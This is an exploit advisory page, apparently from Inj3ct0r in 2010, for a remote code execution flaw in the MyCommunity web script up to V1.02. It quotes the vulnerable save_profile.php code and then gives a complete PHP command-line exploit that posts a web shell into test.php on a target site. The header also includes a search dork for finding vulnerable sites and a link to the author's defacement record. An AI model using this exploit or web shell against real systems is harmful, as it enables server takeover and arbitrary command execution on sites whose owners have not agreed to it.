MyCommunity <= V1.02 Remote Code Execution

Posted on 23 June 2010
<!DOCTYPE HTML PUBLIC '-//W3C//DTD HTML 4.01 Transitional//EN'><html><head><meta http-equiv='Content-Type' content='text/html; charset=windows-1251'><title>MyCommunity &lt;= V1.02 Remote Code Execution </title><link rel='shortcut icon' href='/favicon.ico' type='image/x-icon'><link rel='alternate' type='application/rss+xml' title='Inj3ct0r RSS' href='/rss'></head><body><pre>==========================================
MyCommunity &lt;= V1.02 Remote Code Execution 
==========================================


+-------------------------------------------------------------------------------------------------------------------------------+
|				 _______         __                ______     							|
|				|    |  |.--.--.|  |--..-----.    |      |.----..-----..--.--.--.				|
|				|       ||  |  ||    &lt; |  -__|    |   ---||   _||  -__||  |  |  |				|
|				|__|____||_____||__|__||_____|    |______||__|  |_____||________|				|
+-------------------------------------------------------------------------------------------------------------------------------+
| Name: MyCommunity &lt;= V1.02 Remote Code Execution 										|
| Software: MyCommunity &lt;= V1.02												|
| Site: http://articstudios.net/download.php											|
| Download: http://articstudios.net/mycommunityscript/files/MyCommunity%201.0.2.rar						|
| Vulnerability: Remote Code Execution												|
| Severity: high ( low / medium / high )											|
| Tested on: 1.02														|
| Dork: 'The script is made by &quot;Artic Studios&quot;'											|
+-------------------------------------------------------------------------------------------------------------------------------+
| Author: Lord-Anubis														|
| Contact: lord.anu bis4[at]gm ail[dot]com											|
| Date: 23.06.2010 ( dd.mm.yyyy )												|
| Site: http://lordanubis.altervista.org/											|
| Defaces: http://www.zone-h.org/archive/notifier=Lord-Anubis									|
| Exploits: http://inj3ct0r.com/author/2486											|
+-------------------------------------------------------------------------------------------------------------------------------+
| Bug File: save_profile.php													|
| 3.	if ( isset( $_POST ) )													|
| 4.		$postArray = &amp;$_POST ;            // 4.1.0 or later, use $_POST							|
| 5.	else															|
| 6.		$postArray = &amp;$HTTP_POST_VARS ;    // prior to 4.1.0, use HTTP_POST_VARS					|
| 7.																|
| 8.	foreach ( $postArray as $sForm =&gt; $value )										|
| 9.	{															|
| 10		$postedValue = htmlspecialchars( stripslashes( $value ) ) ;							|
| 11.	$writeValue = stripslashes( $value ) ; 											|
| 12.																|
| 13.	// Open the file for truncated writing											|
| 14.	$fp = @fopen(&quot;test.php&quot;, &quot;w&quot;) or die(&quot;Couldn't open file for writing!&quot;); //change mypage.html to point to the file you	|
| 15.	want to edit														|
| 15.	$numBytes = @fwrite($fp, $writeValue) or die(&quot;Couldn't write html to file!&quot;);						|													|
+-------------------------------------------------------------------------------------------------------------------------------+
| Bug Explanation:														|
|	- EN:	The file save_profile.php allows the creation of a page called test.php without any control on the data POST's	|
|		origin, indeed happens the stripslashes on the strings. Now it will be possible create any  page with any	|
|		content.													|
|	////////////////////////////////////////////////////////////////////////////////////////////////////////////////////	|
|	- ITA:	Il file save_profile.php permette la creazione di una pagina chiamata test.php non effettuando alcun controllo	|
|		sulla provenienza dei dati POST, anzi viene addirittura lo stripslashes sulle stringhe. Sarà così possibile	|
|		creare una pagina qualsiasi con un qualsiasi nostro contenuto.							|
|	////////////////////////////////////////////////////////////////////////////////////////////////////////////////////	|
|	- PL:	...														|
+-------------------------------------------------------------------------------------------------------------------------------+
| Exploit:															|
+-------------------------------------------------------------------------------------------------------------------------------+
&lt;?php
/**
 * exploit.php
 *
 * Software: MyCommunity &lt;= V1.02 
 * Author: Lord-Anubis &lt;lord.anu bis4[at]gm ail[dot]com&gt;
 * Vulnerability: Remote Code Execution
 */

//
error_reporting(0);
ini_set(&quot;max_execution_time&quot;, 0);
ini_set(&quot;default_socket_timeout&quot;, 5);

//
function sendPacket($packet) {
	global $hostName;
	if (!$sock = fsockopen(gethostbyname($hostName), 80)) {
		exit(&quot;[-] No response from '{$hostName}'
&quot;);
	}

	fputs($sock, $packet);
	while (!feof($sock)) {
		$html .= fgets($sock);
	}
	
	fclose($sock);
	return $html;
}

//

//
function phpCode() {
	return	&quot;&lt;?php ob_end_clean();ob_clean();passthru($_GET['cmd']);die('Lord-Anubis');?&gt;&quot;;
}

//
if (php_sapi_name() !== 'cli') {
	exit(
		&quot;&lt;html&gt;&lt;head&gt;&lt;title&gt;Attention!&lt;/title&gt;&lt;/head&gt;
&quot;.
		&quot;&lt;body&gt;&lt;br /&gt;&lt;br /&gt;&lt;center&gt;
&quot;.
		&quot;&lt;h1&gt;Error!&lt;/h1&gt;
&quot;.
		&quot;This exploit is meant to be used as php CLI script!&lt;br /&gt;
&quot;.
		&quot;More information:&lt;br /&gt;
&quot;.
		&quot;&lt;a href=&quot;http://www.google.com/search?hl=en&amp;q=php+cli+windows&quot; target=&quot;_blank&quot;&gt;http://www.google.com/search?hl=en&amp;q=php+cli+windows&lt;/a&gt;&lt;br /&gt;
&quot;.
		&quot;This script will not run through a webserver.&lt;br /&gt;
&quot;.
		&quot;&lt;/center&gt;&lt;/body&gt;&lt;/html&gt;
&quot;
	);
}

//
if ($argc != 3) {
	exit(
		&quot;[+] Software: MyCommunity &lt;= V1.01
&quot;.
		&quot;[+] Author: Lord-Anubis
&quot;.
		&quot;[+] Vulnerability: Remote Code Execution
&quot;.
		&quot;[+] Usage: ./exploit [hostName] [path]
&quot;.
		&quot;[+] Example:
&quot;.
		&quot;[+] ./exploit 127.0.0.1 /
&quot;.
		&quot;[+] ./exploit hostname.com /upload/
&quot;
	);
}

//
list($cli, $hostName, $path) = $argv;

//
$getUrl   = parse_url($hostName);
$hostName = $getUrl[&quot;path&quot;];
if (substr($hostName, 0, 4) == 'www.') {
	$hostName = substr($hostName, 3);
}

//
if (substr($path, 0, 1) != &quot;/&quot;)	{ $path = &quot;/$path&quot;; }
if (substr($path, -1) != &quot;/&quot;)	{ $path = &quot;$path/&quot;; }

//
$postData = &quot;post=&quot;.phpCode();
$packet   = &quot;POST http://{$hostName}{$path}save_profile.php HTTP/1.1
&quot;;
$packet  .= &quot;Content-Type: application/x-www-form-urlencoded
&quot;;
$packet  .= &quot;Host: {$hostName}
&quot;;
$packet  .= &quot;Content-Length: &quot;.strlen($postData).&quot;
&quot;;
$packet	 .= &quot;Referer: http://{$hostName}{$path}

&quot;;
$packet  .= $postData;
$return   = sendPacket($packet);

//
if (!preg_match('/Lord-Anubis/is', $return)) {
	exit(&quot;[-] Exploit failed
&quot;);
}

//
echo(&quot;[+] http://{$hostName}{$path}test.php
&quot;);
echo(&quot;[+] Exploit successfull
&quot;);
exit;
?&gt;


# <a href='http://inj3ct0r.com/'>Inj3ct0r.com</a> [2010-06-23]</pre><script type='text/javascript'>var gaJsHost = (("https:" == document.location.protocol) ? "https://ssl." : "http://www.");document.write(unescape("%3Cscript src='" + gaJsHost + "google-analytics.com/ga.js' type='text/javascript'%3E%3C/script%3E"));</script><script type='text/javascript'>try{var pageTracker = _gat._getTracker("UA-12725838-1");pageTracker._setDomainName("none");pageTracker._setAllowLinker(true);pageTracker._trackPageview();}catch(err){}</script></body></html>
TOP
Malware :

Last 20
Exploits :

Last 20